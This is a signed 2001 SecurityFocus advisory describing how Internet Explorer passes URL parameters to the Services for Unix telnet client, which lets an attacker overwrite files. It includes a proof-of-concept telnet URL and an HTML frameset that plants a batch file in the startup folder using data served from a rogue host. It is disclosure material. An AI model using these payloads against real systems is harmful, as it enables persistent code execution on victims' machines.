-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SecurityFocus.com
http://www.securityfocus.com
Vulnerability Report For Internet Explorer
and Services for Unix 2.0 Telnet Client
Date Published: 13 March 2001
Advisory ID: n/a
Bugtraq ID: 2463
CVE CAN: None currently assigned.
Title: Services for Unix 2.0 Telnet Client File Overwrite
Vulnerability
Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
A vulnerability has been discovered in the interaction between
Internet Explorer and the Telnet client installed with Services
for Unix 2.0, that allows arbitrary files to be overwritten, or
created, containing attacker specified data. This vulnerability
occurs as a result of Internet Explorer executing the "telnet"
command and passing command line parameters, specified in the
URL, to the telnet program.
The Windows 2000 Telnet client contains a client side logging
option, which is used to log all telnet session data to a file
specified by this option. By specifying the "-f" flag to the
telnet command, accompanied by a filename, all session text is
logged to this file.
All versions of Internet Explorer with Services for Unix 2.0
installed are presumed to be vulnerable to this problem.
Solution/Vendor Information/Workaround:
Microsoft has released an update which solves this problem. The
update, and more information can be obtained at the following
locations:
http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
http://www.microsoft.com/windows/ie/download/critical/q286043/default.
asp
Updates are available for Internet Explorer 5.01 Service Pack 1
and Internet Explorer 5.5 Service Pack 1.
November 1, 2000
This vulnerability was discovered by Oliver Friedrichs
<[email protected]>.
This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting
advisories please mail [email protected].
This vulnerability can be reproduced by giving Internet Explorer a
URL
such as the following:
telnet:-f%20\file.txt%20host
The above example will cause Internet Explorer to invoke the telnet
client and cause it to connect to the host "host", logging all output
to the file "\file.txt". An attacker can cause arbitrary data to be
written to this file by setting up a rogue server, such as netcat,
which is listening on the telnet port, sending their desired data to
the client. Arbitrary port numbers can also be specified on the
telnet
command line, so the server need not listen on port 23.
Furthermore, the invocation of the telnet client can be hidden within
existing HTML, automating it's execution. This vulnerability can
also
be exploited via Outlook, which by default will automatically process
HTML messages.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
The above example will cause data that is received from port 8000 on
the host "host" to be written to the file "boom.bat" in the startup
directory for all users. Assuming the logged in user has the
appropriate permissions, this will create a batch file that is
executed
upon any future user logon. Note that if the username is known to
the attacker, this can also be directed towards the logged in user,
who will have permission to create this file.
DISCLAIMER:
The contents of this advisory are copyright (c) 2000
SecurityFocus.com
and may be distributed freely provided that no fee is charged for
this
distribution and proper credit is given.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOq6xlcm4FXxxREdXEQI+8wCfcnxnmIR8nDqOgqlGFxa5nbQldUcAoLW6
uW9Hz+AFB3j7rcJga+DGqUlu
=qvCI
-----END PGP SIGNATURE-----